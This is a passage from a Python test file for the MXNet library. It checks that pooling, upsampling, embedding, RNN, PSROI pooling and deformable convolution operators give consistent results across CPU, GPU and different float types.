pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params, scale=0.1)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
mx.test_utils.assert_allclose(mod1.get_outputs()[0], mod2.get_outputs()[0], rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
mx.test_utils.assert_allclose(args[bias_name], expected_bias)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
